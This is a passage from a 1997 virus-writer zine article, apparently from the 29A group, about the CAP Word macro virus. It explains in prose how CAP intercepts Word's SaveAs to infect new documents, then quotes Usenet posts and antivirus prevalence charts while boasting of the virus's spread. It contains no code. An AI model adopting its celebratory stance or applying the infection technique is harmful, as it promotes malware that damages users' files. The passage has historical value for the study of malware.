will guarantee the survival of our macro virus.
4.5. The "SaveAs" problem solved
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Its kind of curious that the AVP virus description was the only one mentio-
nin something about CAP bein able to "emulate" the "SaveAs" function, how-
ever it ended up sayin the rubish inaccurate statement: "it writes an empty
document to disk". While its worth from Kasper realizin about the "SaveAs"
emulation its unforgivable for any AVer not knowin how Word templatez work.
CAP, when emulatin the "SaveAs" function, doesnt write any "empty" document
to disk, it rather creates a new clean document based on the active tem-
plate, which is the infected document itself and as such it is not empty.
Then CAP saves to disk the new document dependin on the users choice at the
"SaveAs" dialog box and finally infects it. The whole purpose of all this,
is just make the user happy by lettin him select the drive, file format and
directory names when the "SaveAs" dialog box appears.
In the article "Macro virus tricks", point 2 (The "SaveAs" problem), point
2.1 (The "SaveAs" solution) and point 2.2 (The "SaveAs" example), it is ex-
plained in full detail how this "SaveAs" emulation can be achieved in order
to solve the "SaveAs" problem.
5. Shortcutz
ÄÄÄÄÄÄÄÄÄÄÄÄ
(*) alt.comp.virus
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
> CAP.A is a fairly new Word Macro virus. The latest version of McAfee
> should be able to clean it. If it doesn't, you might want to try
> F-Macro from http://www.datafellows.com
BTW, down here (Belgium, Luxembourg, France) and among our global
customers, the CAP virus family has almost instantly become the most
widespread virus we have ever met. Roughly 80% (yes eighty percent)
of all our virus related tech support calls have been about that virus
during the last two months.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) alt.comp.virus
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
> L'accorgimento sembra proprio funzionare (il che mi fa supporre che sia
> un virus del piffero, visto che si lascia aggirare cos facilmente),
Non farti ingannare. Per essere un macro virus, il Macro.Word.Cap e'
piuttosto complesso e contiene una tecnica innovativa che gli permette
di bypassare le barriere poste dalla localizzazione di Word e quindi di
intercettare delle macro sistema in molte versioni di Word che usano un
linguaggio diverso dall'Inglese. Da un punto di vista prettamente
tecnico, il Cap e' un virus tutt'altro che banale.
In genere, il Normal.dot non e' mai protetto dalla scrittura, per cui i
virus writer che scrivono macro virus hanno un approccio diverso
rispetto a quello di chi scrive virus piu' "tradizionali". Non e' un
caso se il Macro.Word.Cap e' ormai uno dei virus piu' diffusi in Italia,
se non addirittura il piu' diffuso in assoluto nel nostro paese.
> 2) che effetti provoca il macro virus CAP (ammesso che fosse quello),
> oltre a cancellare la macro e a nascondere alcuni comandi di Word?
Nulla di particolare.
Il virus intercetta il comando di sistema FileSalvaConNome e controlla
se viene utilizzato per scrivere documenti, modelli o file in formato
Rich Text Format (RTF). In questi casi, converte il file in un modello e
lo infetta. Come risultato si ottiene che un file salvato in formato
RTF, che normalmente non contiene macro, sara' comunque infetto, dal
momento che in realta' verra' salvato come modello.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.geocities.com/SiliconValley/Heights/3652/F.HTM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus Alerts
(based on messages posted to alt.comp.virus)
08-11-97: WM/CAP is becoming the most common virus
05-12-97: Hoax virus alert posted to several newsgroups
05-08-97: WM/Helper virus will put passwords on documents
04-27-97: Word Macro NPad virus in the wild
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.sophos.com/virusinfo/topten/jul97.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Top ten viruses reported to
Sophos last month July 1997 virus top ten
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
July 1997
This month Last month Name Percentage of reports
ÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1 1 Winword/CAP 14.1%
2 5 Form 12.7%
3 3 Anticmos 8.5%
4 7 Winword/Concept 7.0%
5 8 Excel/Laroux 5.6%
5 15 New Zealand-i 5.6%
5 2 Parity Boot 5.6%
8 5 Winword/Npad 4.2%
9 3 CMOS4 2.8%
9 new Winword/Switchr 2.8%
Others 31.1%
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.itasa.com.mx/fprot/soporte/mexvir.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Los virus mas comunes en Mexico
VIRUS CATEGORIA IDENTIFICABLE REMOVIBLE PROCEDIMIENTO
ÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄ
CAP.A Macro s¡ s¡ F-POTATOE 2.27+ (Windows)
15 Years MBR s¡ s¡* Fixdisk repair
Concept Macro s¡ s¡ F-POTATOE (Windows)
Wazzu Macro s¡ s¡ F-POTATOE (Windows)
NPad Macro s¡ s¡ F-POTATOE (Windows)
Implant MBR/com/exe s¡ s¡ F-IMPLAN (v. nota tc. #60)
Monkey MBR s¡ s¡ F-potatoe /hard /disinf
Byway com/exe s¡ s¡** Ver nota tcnica #58
Natas MBR/com/exe s¡ s¡ F-potatoe /hard /disinf
Boot.437 Boot s¡ s¡ Sys c: diskette.
Exebug MBR s¡ s¡ F-potatoe /hard /disinf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Btw, note that Implant (original name: SuckSexee), another virus written by
a 29A member (GriYo), ranks sixth as the most widespread virus in Mexico.
(*) http://www.dataalert.com/top.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virussen Top 10
Data Alert International B.V.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
De meest gerapporteerde en voorkomende virussen in de BeNeLux.
JULI-AUGUSTUS 1997
Rang Virusnaam Virustype
ÄÄÄÄ ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
1. WM/Cap Macro
2. XM/Laroux Macro
3. Antiexe Boot
4. WM/Npad Macro
5. AntiCMOS.A Boot
6. WM/Concept Macro
7. Junkie Multi
8. Ripper Boot
9. NYB Boot
10. Parity.Boot Boot
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) http://www.virusbtn.com/Prevalence/199708.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
VB Prevalence Table, August 1997
Virus Name Type Number of incidents Percentage
ÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄ
CAP Macro 145 28.5%
Concept Macro 51 10.0%
NPad Macro 39 7.7%
Dodgy Boot 26 5.1%
Parity_Boot Boot 24 4.7%
Form Boot 21 4.1%
AntiEXE Boot 19 3.7%
Temple Macro 16 3.1%
Laroux Macro 15 3.0%
Wazzu Macro 14 2.8%
[...]
Total: 508 100.0%
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
6. Disclaimer
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
This information is for educational purposez only. The author is not res-
ponsible for any problemz caused by the use of this information.
(c) 1997. Jacky Qwerty/29A.